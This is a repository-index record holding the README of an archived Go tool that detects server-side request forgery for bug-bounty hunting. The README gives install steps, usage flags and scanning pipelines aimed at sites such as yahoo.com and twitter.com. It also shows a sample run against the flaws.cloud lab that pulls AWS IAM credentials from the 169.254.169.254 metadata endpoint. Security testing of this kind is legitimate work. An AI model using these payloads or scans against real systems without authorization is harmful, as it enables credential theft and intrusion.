{"id":13842413,"url":"https://github.com/R0X4R/ssrf-tool","last_synced_at":"2025-07-11T15:31:09.942Z","repository":{"id":57565398,"uuid":"337436169","full_name":"R0X4R/ssrf-tool","owner":"R0X4R","description":"An SSRF detector tool written in golang. I have fixed some errors and added some more payloads to it. But the tool credits go to z0idsec.","archived":true,"fork":false,"pushed_at":"2021-02-10T03:44:01.000Z","size":466,"stargazers_count":43,"open_issues_count":4,"forks_count":11,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-11-21T13:35:22.527Z","etag":null,"topics":["bugbounty","bugbounty-tool","bugbountytips","go","ssrf","ssrf-tool","tools"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/R0X4R.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-02-09T14:45:51.000Z","updated_at":"2024-08-28T11:00:38.000Z","dependencies_parsed_at":"2022-09-03T12:20:57.363Z","dependency_job_id":null,"html_url":"https://github.com/R0X4R/ssrf-tool","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/R0X4R/ssrf-tool","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/R0X4R","download_url":"https:/
/codeload.github.com/R0X4R/ssrf-tool/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264840522,"owners_count":23671685,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bugbounty-tool","bugbountytips","go","ssrf","ssrf-tool","tools"],"created_at":"2024-08-04T17:01:34.048Z","updated_at":"2025-07-11T15:31:09.618Z","avatar_url":"https://github.com/R0X4R.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"# SSRF Detector Tool\n\nA SSRF detector tool written in golang. I have fixed some errors and added some more payloads into it. 
But the tool credit goes to [z0idsec](https://twitter.com/z0idsec).\n\n### Upcoming Features\n- Fetch endpoints from JavaScript files ✅ \n- Bruteforce parameters ✅ \n- Find SSRF in those parameters ✅ \n- Match multiple patterns in the response ✅ \n- Check POST Request ❌\n- Check Headers ❌\n\n### Features\n- Wordlist Creation\n- Inject in every parameter one by one\n- Very fast speed\n- Inject into paths\n- Silent Mode\n- Fetch endpoints from JavaScript files \n- Bruteforce parameters  \n- Find SSRF in those parameters \n- Match multiple patterns in the response\n\n### Note\n\nWhen creating wordlists or looking for SSRF with my tool, make sure that the domains are resolved.\nTo do so, you can use:\n- [httpx](https://github.com/projectdiscovery/httpx)\n- [httprobe](https://github.com/tomnomnom/httprobe)\n- [massdns](https://github.com/blechschmidt/massdns)\n\nAlso, make sure to customize your patterns file for better results.\n\n+ **Installation**\n    \n    ```sh\n    git clone https://github.com/R0X4R/ssrf-tool.git\n    cd ssrf-tool\n    go build ssrftool.go \u0026\u0026 mv ssrftool /usr/bin/\n    ```\n    You can also download the precompiled [binary](https://github.com/R0X4R/ssrf-tool/releases)\n    \n+ **Usage**\n\n    ```sh\n    █▀ █▀ █▀█ █▀▀\n    ▄█ ▄█ █▀▄ █▀░\n\n        v1.2 - @z0idsec (fixed by @R0X4R)\n\n    [WRN] Use with caution. 
You are responsible for your actions\n    [WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\n    Usage of ./ssrftool:\n    -append\n            Append the payload to the parameter\n    -brute\n            Brute force parameters against endpoints to find SSRF\n    -concurrency int\n            Set the concurrency for greater speeds (default 30)\n    -domains string\n            The list of subdomains\n    -gen\n            Generate a SSRF wordlist to be used\n    -parameters string\n            The parameters list\n    -paths\n            (true or false) for testing paths or parameters\n    -pattern string\n            Match the response with a pattern (e.g.) 'Success:'\n    -patterns string\n            Match the response with a list of patterns\n    -payloads string\n            The payloads list\n    -silent\n            silent output\n    ```\n  \n    **Payloads and patterns files:** [https://github.com/R0X4R/ssrf-tool/tree/main/important](https://github.com/R0X4R/ssrf-tool/tree/main/important)\n    \n    **Exploitation**\n    \n    ```sh\n    end@root:~$ ./ssrftool -domains domains -paths=true -payloads payloads.txt -patterns patterns.txt\n\n\n    █▀ █▀ █▀█ █▀▀\n    ▄█ ▄█ █▀▄ █▀░\n\n        v1.2 - @z0idsec (fixed by @R0X4R)\n\n    [WRN] Use with caution. 
You are responsible for your actions\n    [WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\n    \u003e  Testing  http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy//169.254.169.254/latest/meta-data/iam/security-credentials/flaws/\n    {\n      \"Code\" : \"Success\",\n      \"LastUpdated\" : \"2021-02-10T03:03:06Z\",\n      \"Type\" : \"AWS-HMAC\",\n      \"AccessKeyId\" : \"ASIA6GG7PSQGZ6OYP77X\",\n      \"SecretAccessKey\" : \"48Qe7eyMwWzPz8FiwtH+RQIaDtZPZf1DVCEiMia9\",\n      \"Token\" : \"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\",\n      \"Expiration\" : \"2021-02-10T09:26:50Z\"\n    }\n    VULNERABLE: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy//169.254.169.254/latest/meta-data/iam/security-credentials/flaws/\n    ```\n\n\n+ **Find SSRF in paths with Subfinder, httpx**\n\n    ```sh\n    subfinder -d yahoo.com -silent | httpx -silent \u003e\u003e domains | ssrf-tool -domains domains -payloads ssrf.txt -silent=false -paths=true -patterns patterns.txt\n    ```\n\n+ **Wordlist Creation**\n\n    ```sh\n    echo \"https://www.twitter.com\" | getJS -complete | ssrf-tool -gen=true\n    ```\n\n    Can be used with other tools like subfinder \u0026 amass\n\n+ **BruteForce For SSRF**\n\n    ```sh\n    echo \"https://www.twitter.com\" | getJS -complete | anew domains | ssrftool -domains domains -silent=false -brute=true -gen=true -patterns patterns.txt  -parameters params.txt\n    ```\n\n+ **Testing The Paths**\n\n    ```sh\n    ssrftool -domains domains -silent=false -patterns patterns.txt -paths=true  -brute=false -payloads ssrf.txt\n    ```\n\n+ **Testing Parameters with waybackurls**\n\n    ```sh\n    echo \"twitter.com\" | waybackurls \u003e\u003e domains; ssrftool -domains domains -silent=false -paths=false -payloads ssrf.txt\n    ```\n\n**Credits:** \n[@z0idsec](https://twitter.com/z0idsec)    
[@ethicalhackingplayground](https://github.com/ethicalhackingplayground/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FR0X4R%2Fssrf-tool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FR0X4R%2Fssrf-tool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FR0X4R%2Fssrf-tool/lists"}